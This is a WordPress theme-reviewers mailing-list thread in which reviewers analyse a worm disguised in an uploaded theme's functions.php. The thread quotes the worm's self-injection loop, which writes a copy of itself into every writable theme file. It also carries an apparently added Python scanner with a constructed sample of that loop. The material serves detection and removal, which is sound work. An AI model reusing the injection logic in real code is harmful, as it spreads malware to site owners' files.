No subject


Tue Apr 20 23:23:57 UTC 2010


foreach ($direst as $item){
			if (is_writable($item)){

For every one it finds to be writable, it injects itself into the file
like this:
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
	$explar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
	$output .= $before . "Not found" . $after;
	if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
	$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $explar . "\n" .$widget);fclose($f);
	$output .= ($showdots && $ellipsis) ? "..." : "";
}

A lot of that is smokescreen, the line that counts is this one:
fputs($f=fopen($item,"w+"),$cont . $explar . "\n" .$widget);fclose($f);

The fputs writes to the file. The $widget contains a copy of itself.

Everything else in there, all that SQL and crap: all smokescreen. None
of it does anything.

-Otto
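A detector for the propagation loop Otto describes, written here as an added example (it is not code from this thread or from WordPress): it flags a theme file that combines file enumeration or an is_writable() check with reading a file back, locating its closing ?> and writing the content out again. The indicator regexes, the verdict thresholds and the two constructed sample files are all assumptions. It is a triage heuristic of the kind an upload check could run, not a definitive verdict: caching code legitimately reads and writes files, and a payload that splices itself in some other way would not trip the "tag_splice" indicator.

```python
"""Heuristic scan for the propagation loop described above: a theme file that
enumerates other files, checks is_writable(), reads each one back, finds the
closing '?>' and writes a payload after it. Added example; the indicator
regexes, thresholds and sample files are all assumptions."""
import os
import re
import sys
import tempfile

# One regex per indicator. None is conclusive alone (caching code legitimately
# reads and writes files), so classify() demands a combination.
INDICATORS = {
    # content written back to disk
    "write_back": re.compile(r'\b(fputs|fwrite|file_put_contents)\s*\('),
    # fopen() in a write/append mode
    "open_write": re.compile(r'\bfopen\s*\([^,]+,\s*[\'"][wacx]\+?[\'"]'),
    "read_file": re.compile(r'\bfile_get_contents\s*\('),
    "writable_check": re.compile(r'\bis_writable\s*\('),
    # ways to enumerate sibling files
    "dir_walk": re.compile(r'\b(glob|scandir|opendir|readdir|RecursiveDirectoryIterator)\b'),
    # locating the splice point: a str*pos() call hunting for '?>'
    "tag_splice": re.compile(r'\bstrr?i?pos\s*\([^;]*?([\'"]\?[\'"]\s*\.\s*[\'"]>[\'"]|[\'"]\?>[\'"])'),
    # a PHP tag assembled from pieces, so a grep for '?>' or '<?php' misses it
    "split_php_tag": re.compile(r'[\'"][<?][\'"]\s*\.\s*[\'"][?>][\'"]'),
}


def find_indicators(src: str) -> dict:
    """Map each indicator name to whether it occurs in the PHP source."""
    return {name: bool(rx.search(src)) for name, rx in INDICATORS.items()}


def classify(ind: dict) -> str:
    """'high'       : enumerate/writable + read + write-back + '?>' splice
       'suspicious' : the same chain without a visible splice point
       'clean'      : anything less"""
    writes = ind["write_back"] or ind["open_write"]
    chain = writes and ind["read_file"] and (ind["writable_check"] or ind["dir_walk"])
    if not chain:
        return "clean"
    return "high" if (ind["tag_splice"] or ind["split_php_tag"]) else "suspicious"


def scan_dir(root: str) -> list:
    """Return (path, verdict, indicators) for every .php file under root."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                ind = find_indicators(fh.read())
            findings.append((path, classify(ind), ind))
    return findings


# Constructed test inputs (not the file from the thread).
# Skeleton of the read / splice at '?>' / write-back loop:
WORMY_SAMPLE = r'''<?php
foreach (glob(get_template_directory() . '/*.php') as $item) {
    if (is_writable($item)) {
        $cont = file_get_contents($item);
        if (stripos($cont, $marker) === false) {
            $cut = strripos($cont, "?" . ">");
            fputs($f = fopen($item, "w+"), substr($cont, 0, $cut + 2) . "\n" . $payload);
            fclose($f);
        }
    }
}
'''
# An ordinary functions.php that reads a file but never writes one:
CLEAN_SAMPLE = r'''<?php
function mytheme_setup() {
    add_theme_support('post-thumbnails');
    register_nav_menus(array('primary' => __('Primary Menu', 'mytheme')));
}
add_action('after_setup_theme', 'mytheme_setup');
$style = file_get_contents(get_template_directory() . '/style.css');
'''


def demo() -> dict:
    """Write both samples into a throwaway theme directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "sample-theme")
        os.mkdir(theme)
        for name, body in (("functions.php", WORMY_SAMPLE), ("clean.php", CLEAN_SAMPLE)):
            with open(os.path.join(theme, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return {os.path.basename(p): verdict for p, verdict, _ in scan_dir(theme)}


if __name__ == "__main__":
    if len(sys.argv) > 1:  # e.g. python scan_theme.py wp-content/themes
        for path, verdict, _ in scan_dir(sys.argv[1]):
            print(f"{verdict:10s} {path}")
    else:
        print(demo())  # {'clean.php': 'clean', 'functions.php': 'high'}
```

Run it against a themes directory and review anything rated "suspicious" or "high" by hand, starting from the write call, which is the line that matters in the sample above; the indicators a file tripped are returned alongside the verdict so the reviewer can see why it was flagged.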



On Fri, Sep 3, 2010 at 8:58 AM, Chip Bennett <chip at chipbennett.net> wrote:
> Can you and Chris put together some kind of lesson for the rest of us? Sort
> of a "watch out for this kind of thing" that we can learn from?
> (I found the second one before you got it pulled from SVN; so at least I can
> look at it in the meantime.)
> Chip
>
> On Fri, Sep 3, 2010 at 8:56 AM, Otto <otto at ottodestruct.com> wrote:
>>
>> Actually, I went ahead and removed them from SVN because we don't need
>> malware of that sort in there.
>>
>> But if you want a copy, I did save the bad functions.php file, just
>> for examination later. We may be able to detect this sort of thing in
>> the uploader and prevent it from uploading.
>>
>> -Otto
>>
>>
>>
>> On Fri, Sep 3, 2010 at 8:50 AM, Chip Bennett <chip at chipbennett.net> wrote:
>> > I'll have to take a look at those tickets.
>> > Good learning opportunity for the reviewers? (Or an example of why
>> > security gurus are needed, for a security-review stage of the process?)
>> > Chip
>> >
>> > On Fri, Sep 3, 2010 at 8:45 AM, Otto <otto at ottodestruct.com> wrote:
>> >>
>> >> Never mind. I see it. It's in the functions.php file, disguised.
>> >> Clever.
>> >>
>> >> -Otto
>> >>
>> >>
>> >>
>> >> On Fri, Sep 3, 2010 at 8:42 AM, Otto <otto at ottodestruct.com> wrote:
>> >> > I'm looking at it now.. Where's the worm? Not finding it.
>> >> >
>> >> > -Otto
>> >> >
>> >> >
>> >> >
>> >> > On Fri, Sep 3, 2010 at 8:07 AM, Chris <chris at thematic4you.com> wrote:
>> >> >> Tickets #870 and #873
>> >> >>
>> >> >>
>> >> >>
>> >> >> From: theme-reviewers-bounces at lists.wordpress.org
>> >> >> [mailto:theme-reviewers-bounces at lists.wordpress.org] On Behalf Of
>> >> >> Edward Caissie
>> >> >> Sent: Friday, 3 September 2010 14:47
>> >> >>
>> >> >> To: theme-reviewers at lists.wordpress.org
>> >> >> Subject: Re: [theme-reviewers] Emergency Call
>> >> >>
>> >> >>
>> >> >>
>> >> >> SVN is a forever land ... without intervention by a "System Admin"
>> >> >> as far as I know.
>> >> >>
>> >> >> We can keep it out of Extend/Themes easy enough but beyond that we
>> >> >> do not have much control.
>> >> >>
>> >> >> What tickets/themes are you referring to?
>> >> >>
>> >> >>
>> >> >> Cais.
>> >> >>
>> >> >> On Fri, Sep 3, 2010 at 7:08 AM, Chris <chris at thematic4you.com> wrote:
>> >> >>
>> >> >> Indeed .. infecting all installed themes of a blog.
>> >> >>
>> >> >>
>> >> >>
>> >> >> From: theme-reviewers-bounces at lists.wordpress.org
>> >> >> [mailto:theme-reviewers-bounces at lists.wordpress.org] On Behalf Of
>> >> >> Philip M. Hofer (Frumph)
>> >> >> Sent: Friday, 3 September 2010 13:00
>> >> >> To: theme-reviewers at lists.wordpress.org
>> >> >> Subject: Re: [theme-reviewers] Emergency Call
>> >> >>
>> >> >>
>> >> >>
>> >> >> Oh fricken lovely.
>> >> >>
>> >> >> ----- Original Message -----
>> >> >>
>> >> >> From: Chris
>> >> >>
>> >> >> To: theme-reviewers at lists.wordpress.org
>> >> >>
>> >> >> Sent: Friday, September 03, 2010 3:55 AM
>> >> >>
>> >> >> Subject: [theme-reviewers] Emergency Call
>> >> >>
>> >> >>
>> >> >>
>> >> >> Hi,
>> >> >>
>> >> >>
>> >> >>
>> >> >> - Who is able to remove / delete / nuke two themes from the SVN??
>> >> >>
>> >> >> - Who is in charge of the scripts running right after theme upload??
>> >> >>
>> >> >>
>> >> >>
>> >> >> Had an encounter with not so clean themes .. the themes are
>> >> >> rejected, but need to be removed from the SVN as soon as possible.
>> >> >>
>> >> >>
>> >> >>
>> >> >> In addition I would like to see the upload script filtering for a
>> >> >> not so nice wormy gift.
>> >> >>
>> >> >>
>> >> >>
>> >> >> Thanks,
>> >> >>
>> >> >>
>> >> >>
>> >> >> Chris
>> >> >>
>> >> >>
>> >> >>
>> >> >>
>> >> >>
>> >> >>
>> >> >>
>> >> >> ________________________________
>> >> >>
>> >> >> _______________________________________________
>> >> >> theme-reviewers mailing list
>> >> >> theme-reviewers at lists.wordpress.org
>> >> >> http://lists.wordpress.org/mailman/listinfo/theme-reviewers
>> >> >
>> >
>> >
>> >
>> >
>
>
>
>

